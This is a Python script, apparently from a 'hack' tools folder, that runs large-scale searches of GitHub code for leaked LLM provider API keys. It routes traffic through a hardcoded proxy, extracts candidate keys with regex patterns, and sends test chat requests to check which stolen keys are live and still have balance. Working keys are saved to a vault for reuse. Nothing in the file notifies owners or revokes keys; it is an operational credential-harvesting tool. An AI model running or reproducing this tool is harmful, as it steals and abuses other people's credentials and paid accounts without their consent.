Files
hack/tools/scripts/llm-key-hunter/hunt_all_deep.py
T

459 lines
19 KiB
Python

#!/usr/bin/env python3
"""Unified deep hunter across all LLM providers — INCREMENTAL.
Only fetches/verifies NEW candidates:
* GitHub file URLs already seen (any results/*/candidates.tsv) are skipped.
* Keys already in the vault, any bucket file, or the verify cache are skipped.
* Already-crawled blobs are served from results/_cache/content (477MB warm).
Run: python3 hunt_all_deep.py --search # gather new candidate files
python3 hunt_all_deep.py --verify # harvest + verify only new keys
python3 hunt_all_deep.py --providers minimax,deepseek # subset
"""
import argparse, json, os, re, sys, time, urllib.parse, urllib.request, urllib.error
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
sys.path.insert(0, str(Path(__file__).resolve().parent))
from verify_cache import CachedVerifier
from content_cache import ContentCache
import providers_all_deep as P
HERE = Path(__file__).resolve().parent
RESULTS = HERE / "results" / "all_deep"
RESULTS.mkdir(parents=True, exist_ok=True)
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
TOKEN = (os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
or os.popen("gh auth token 2>/dev/null").read().strip())
GH_OPENER = (urllib.request.build_opener(
urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY}))
if GH_PROXY else urllib.request.build_opener())
DIRECT = urllib.request.build_opener()
UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/124.0 Safari/537.36")
def http(base, path, key, body=None, method=None, timeout=30, extra=None):
url = base + path
headers = {"Authorization": "Bearer " + key, "User-Agent": UA,
"Accept": "application/json, */*"}
data = None
if body is not None:
data = json.dumps(body).encode(); headers["Content-Type"] = "application/json"
if extra:
headers.update(extra)
req = urllib.request.Request(url, data=data, headers=headers,
method=method or ("POST" if body is not None else "GET"))
try:
with DIRECT.open(req, timeout=timeout) as r:
return r.getcode(), r.read().decode("utf-8", "replace")
except urllib.error.HTTPError as e:
try:
return e.code, e.read().decode("utf-8", "replace")
except Exception:
return e.code, ""
except Exception as e:
return 0, f"net:{type(e).__name__}"
def msg_of(body):
try:
j = json.loads(body)
err = j.get("error") if isinstance(j, dict) else None
if isinstance(err, dict):
# combine code + message so balance codes get caught
parts = [str(err.get("message", "")), str(err.get("code", "")),
str(err.get("type", ""))]
return " ".join(p for p in parts if p and p != "None")[:200]
if isinstance(err, str):
return err[:200]
if isinstance(j, dict):
return str(j.get("message", j.get("msg", "")))[:200]
except Exception:
pass
return (body or "")[:200]
def openai_verify(base, path, models, extra_headers=None):
def v(key):
last = "no model"
for model in models:
code, body = http(base, path, key,
{"model": model,
"messages": [{"role": "user", "content": "reply ok"}],
"max_tokens": 16, "temperature": 0.01},
extra=extra_headers)
verdict, detail = classify_openai(code, body)
if verdict in ("USABLE", "DEAD", "NO_BALANCE"):
return verdict, f"{model} {detail}"
last = f"{model} {detail}"
return "UNKNOWN", last
return v
def classify_openai(code, body):
if code == 200:
try:
j = json.loads(body)
except Exception:
return "UNKNOWN", "200 non-json"
if j.get("choices"):
return "USABLE", "200 choices"
br = j.get("base_resp") or {}
bc = br.get("status_code")
if bc is not None:
return classify_minimax_code(bc, br.get("status_msg", ""))
ec = j.get("error") or {}
if isinstance(ec, dict) and ec.get("code"):
return classify_native_code(ec.get("code"), ec.get("message", ""))
return "UNKNOWN", "200 no choices"
if code == 401:
return "DEAD", f"401 {msg_of(body)}"
if code in (402, 429):
return "NO_BALANCE", f"{code} {msg_of(body)}"
if code == 400:
m = msg_of(body).lower()
if any(w in m for w in ("invalid", "unauthor", "api key", "authentication",
"incorrect", "does not exist")):
return "DEAD", f"400 {msg_of(body)}"
if any(w in m for w in ("balance", "quota", "insufficient", "limit",
"payment", "arrears", "exhaust", "credit")):
return "NO_BALANCE", f"400 {msg_of(body)}"
return "NO_ACCESS", f"400 {msg_of(body)}"
if code in (403, 404, 422, 451):
m = msg_of(body).lower()
# 401-style invalid-key messages can arrive as 403/400 on some gateways
if any(w in m for w in ("invalid_api_key", "invalid api key",
"incorrect api key", "invalid key",
"authentication", "鉴权不通过", "无效的令牌",
"apikey not found", "bad forward key",
"invalid_credentials", "not authorized",
"not_authorized", "forbidden. you have no")):
# balance-keyed forbidden must win first
pass
if any(w in m for w in ("insufficient_balance", "balance", "quota",
"额度不足", "余额不足", "账户余额", "可用余额",
"arrears", "exhaust", "credit",
"insufficient balance", "用户额度")):
return "NO_BALANCE", f"{code} {msg_of(body)}"
if any(w in m for w in ("invalid_api_key", "invalid api key",
"incorrect api key", "invalid key",
"authentication", "鉴权不通过", "无效的令牌",
"apikey not found", "bad forward key",
"invalid_credentials", "not_authorized",
"not authorized error", "no permission")):
return "DEAD", f"{code} {msg_of(body)}"
return "NO_ACCESS", f"{code} {msg_of(body)}"
if code in (500, 502, 503, 520, 524, 0):
return "UNKNOWN", f"{code} {msg_of(body)}"
return "NO_ACCESS", f"{code} {msg_of(body)}"
def classify_minimax_code(bc, m=""):
if bc == 0:
return "USABLE", "200 choices"
if bc in (1001, 1003, 1004, 1014, 1111, 2049):
return "DEAD", f"{bc} {m}"
if bc == 2056:
return "NO_BALANCE", f"{bc} token plan capped"
if bc in (1002, 1008, 1013, 1026, 1038, 1045, 1063, 1064, 1082):
return "NO_BALANCE", f"{bc} {m}"
return "NO_ACCESS", f"{bc} {m}"
def classify_native_code(code, m=""):
cs = str(code)
if cs in ("1113",):
return "NO_BALANCE", f"{cs} no balance/resource"
if cs in ("1310", "1313", "1305", "1302"):
return "NO_BALANCE", f"{cs} rate/cap"
return "NO_ACCESS", f"{cs} {m}"
def google_verify(key):
"""Google Gemini uses a non-OpenAI endpoint; API key in query string."""
url = (f"https://generativelanguage.googleapis.com/v1beta/models/"
f"gemini-1.5-flash:generateContent?key={key}")
body = json.dumps({"contents": [{"parts": [{"text": "reply ok"}]}],
"generationConfig": {"maxOutputTokens": 16}}).encode()
req = urllib.request.Request(url, data=body,
headers={"Content-Type": "application/json",
"User-Agent": UA})
try:
with DIRECT.open(req, timeout=30) as r:
d = json.loads(r.read())
if d.get("candidates"):
return "USABLE", "gemini-1.5-flash 200 candidates"
return "NO_ACCESS", f"200 {str(d)[:100]}"
except urllib.error.HTTPError as e:
b = e.read().decode("utf-8", "replace")
if e.code == 400 and "API_KEY_INVALID" in b:
return "DEAD", f"400 API_KEY_INVALID"
if e.code == 403 or e.code == 429:
return "NO_BALANCE", f"{e.code} {msg_of(b)}"
if e.code == 401:
return "DEAD", f"401 {msg_of(b)}"
return "NO_ACCESS", f"{e.code} {msg_of(b)}"
except Exception as e:
return "UNKNOWN", f"net:{type(e).__name__}"
# ── Dedup: gather ALL previously seen URLs & keys ───────────────
def load_seen():
seen_urls = set()
seen_keys = set()
# 1) every candidates.tsv anywhere under results/
for p in HERE.glob("results/**/candidates.tsv"):
try:
for ln in p.read_text(errors="replace").splitlines():
parts = ln.split("\t")
if len(parts) >= 3:
seen_urls.add(parts[2].strip())
if len(parts) >= 4:
seen_keys.add(parts[3].strip())
except Exception:
pass
# 2) every bucket .txt (key is first field, tab or pipe separated)
for p in HERE.glob("results/**/*.txt"):
if p.name in ("candidates.tsv",):
continue
try:
for ln in p.read_text(errors="replace").splitlines():
line = ln.strip()
if not line:
continue
k = re.split(r"[\t|]", line, maxsplit=1)[0].strip()
if k and (k.startswith("sk-") or k.startswith("gsk_")
or k.startswith("ak_") or k.startswith("sk-ant")
or k.startswith("AIza") or "." in k or "-" in k):
seen_keys.add(k)
except Exception:
pass
# 3) vault keys
for p in HERE.glob("usable_keys/*/keys.json"):
try:
d = json.loads(p.read_text())
d = d if isinstance(d, list) else [d]
for e in d:
if isinstance(e, dict) and e.get("key"):
seen_keys.add(e["key"].strip())
except Exception:
pass
# 4) verify cache keys
for p in HERE.glob("results/_cache/*.json"):
try:
d = json.loads(p.read_text())
if isinstance(d, dict):
seen_keys.update(k for k in d.keys())
except Exception:
pass
# 5) keys.env
for p in HERE.glob("usable_keys/*/keys.env"):
try:
for ln in p.read_text(errors="replace").splitlines():
if "=" in ln:
seen_keys.add(ln.split("=", 1)[1].strip())
except Exception:
pass
return seen_urls, seen_keys
def gh_code_search(query, max_results=100):
out = []
for page in range(1, 4):
url = ("https://api.github.com/search/code?"
+ urllib.parse.urlencode({"q": query, "per_page": 100, "page": page}))
req = urllib.request.Request(url, headers={
"Authorization": "token " + TOKEN,
"Accept": "application/vnd.github+json",
"User-Agent": "all-deep-hunter/1.0"})
try:
with GH_OPENER.open(req, timeout=30) as r:
data = json.loads(r.read())
except urllib.error.HTTPError as e:
if e.code in (403, 429):
reset = e.headers.get("X-RateLimit-Reset")
wait = min(max(int(reset) - int(time.time()) + 2, 2), 120) if reset else 30
time.sleep(wait); continue
if e.code == 422:
break
time.sleep(5); continue
except Exception:
time.sleep(5); continue
items = data.get("items", [])
for it in items:
out.append((it["repository"]["full_name"], it["path"], it["html_url"]))
if len(items) < 100:
break
time.sleep(6.5)
return out[:max_results]
def fetch_raw_cached(repo, path, url, cc):
# URL form .../blob/<sha>/<path> -> key cache on immutable sha
m = re.search(r"/blob/([0-9a-f]{40})/", url)
sha = m.group(1) if m else ""
if sha:
hit = cc.get(repo.lower(), path, sha)
if hit is not None:
return hit
txt = ""
for ref in ("HEAD", "main", "master"):
u = f"https://raw.githubusercontent.com/{repo}/{ref}/{path}"
req = urllib.request.Request(u, headers={"User-Agent": UA})
try:
with GH_OPENER.open(req, timeout=25) as r:
txt = r.read().decode("utf-8", "replace")
break
except urllib.error.HTTPError as e:
if e.code == 404:
continue
break
except Exception:
continue
if txt and sha:
cc.put(repo.lower(), path, sha, txt)
return txt
def harvest(text, patterns, context, fakes):
if not text:
return set()
low = text.lower()
has_ctx = any(c in low for c in context) if context else True
found = set()
for rx in patterns:
for m in rx.finditer(text):
k = m.group(0).rstrip("'\"`,;)]")
kl = k.lower()
if any(f in kl for f in fakes):
continue
if context and not k.startswith(("sk-cp-", "sk-ant", "gsk_",
"ak_", "sk-or-v1-", "AIza")):
lo = max(0, m.start() - 100); hi = min(len(low), m.end() + 100)
if not any(c in low[lo:hi] for c in context):
continue
if not has_ctx and context:
continue
found.add(k)
return found
def main():
ap = argparse.ArgumentParser()
ap.add_argument("--search", action="store_true")
ap.add_argument("--verify", action="store_true")
ap.add_argument("--providers", default="", help="comma list, default all")
ap.add_argument("--workers", type=int, default=24)
args = ap.parse_args()
specs = P.build(openai_verify)
# google has a custom verifier
if "google" in specs:
specs["google"]["verify"] = google_verify
# patterns may be raw strings in the registry; compile once here.
for s in specs.values():
s["patterns"] = [re.compile(p) for p in s["patterns"]]
if args.providers:
want = set(args.providers.split(","))
specs = {k: v for k, v in specs.items() if k in want}
cand = RESULTS / "candidates.tsv"
seen_urls, seen_keys = load_seen()
print(f"dedup baseline: {len(seen_urls)} known URLs, {len(seen_keys)} known keys", flush=True)
if args.search:
new_urls = 0
for name, spec in specs.items():
for q in spec["queries"]:
res = gh_code_search(q)
added = 0
with cand.open("a") as f:
for repo, path, url in res:
if url in seen_urls:
continue
seen_urls.add(url)
f.write(f"{name}\t{repo}\t{path}\t{url}\n")
added += 1; new_urls += 1
print(f" [{name:16}] {q[:42]:42} {len(res):3} hits, {added:3} new", flush=True)
time.sleep(2)
print(f"search done: {new_urls} new candidate files -> {cand}", flush=True)
if args.verify:
if not cand.exists():
print("no candidates.tsv (run --search first)"); return
rows = [ln.rstrip("\n").split("\t") for ln in cand.read_text().splitlines() if ln.strip()]
print(f"harvesting {len(rows)} candidate files...", flush=True)
cc = ContentCache()
# provider -> {key: source}
new_keys = {name: {} for name in specs}
valid = [(row[0], row[1], row[2], row[3]) for row in rows
if len(row) >= 4 and row[0] in specs]
done_n = 0
harvest_workers = min(48, args.workers * 2)
print(f" fetching {len(valid)} files with {harvest_workers} workers...", flush=True)
def fetch_one(item):
prov, repo, path, url = item
spec = specs[prov]
try:
txt = fetch_raw_cached(repo, path, url, cc)
except Exception:
txt = ""
found = set()
for k in harvest(txt, spec["patterns"], spec["context"], spec["fakes"]):
if k not in seen_keys:
found.add(k)
return prov, url, found
with ThreadPoolExecutor(max_workers=harvest_workers) as ex:
for prov, url, found in ex.map(fetch_one, valid):
done_n += 1
for k in found:
new_keys[prov].setdefault(k, url)
if done_n % 100 == 0:
tot = sum(len(v) for v in new_keys.values())
print(f" {done_n}/{len(valid)} new_keys={tot}", flush=True)
cc.save()
total = sum(len(v) for v in new_keys.values())
print(f"harvest done: {total} NEW candidate keys across all providers", flush=True)
for name in new_keys:
if new_keys[name]:
print(f" {name:16}: {len(new_keys[name])} new", flush=True)
buckets = {k: [] for k in ("USABLE", "NO_BALANCE", "NO_ACCESS", "UNKNOWN", "DEAD")}
for name, spec in specs.items():
keys = new_keys.get(name, {})
if not keys:
continue
print(f"\n=== verifying {name}: {len(keys)} new keys ===", flush=True)
with CachedVerifier(f"alldeep_{name}", spec["verify"]) as ver:
with ThreadPoolExecutor(max_workers=args.workers) as ex:
futs = {ex.submit(ver, k): (k, s) for k, s in keys.items()}
done = 0
for f in as_completed(futs):
k, s = futs[f]; done += 1
try:
v, d = f.result()
except Exception as e:
v, d = "UNKNOWN", f"exc:{e}"
buckets[v].append((name, k, s, d))
if done % 25 == 0:
print(f" {name} {done}/{len(keys)}", flush=True)
for label in buckets:
with (RESULTS / f"{label.lower()}.txt").open("w") as f:
for prov, k, s, d in buckets[label]:
f.write(f"{prov}\t{k}\t{s}\t{d}\n")
print("\n=== FINAL (NEW keys only) ===")
for label in buckets:
print(f" {label:11}: {len(buckets[label])}")
for prov, k, s, d in buckets["USABLE"]:
print(f" ✅ [{prov}] {k[:50]} {d}")
print(f" {s}")
if __name__ == "__main__":
main()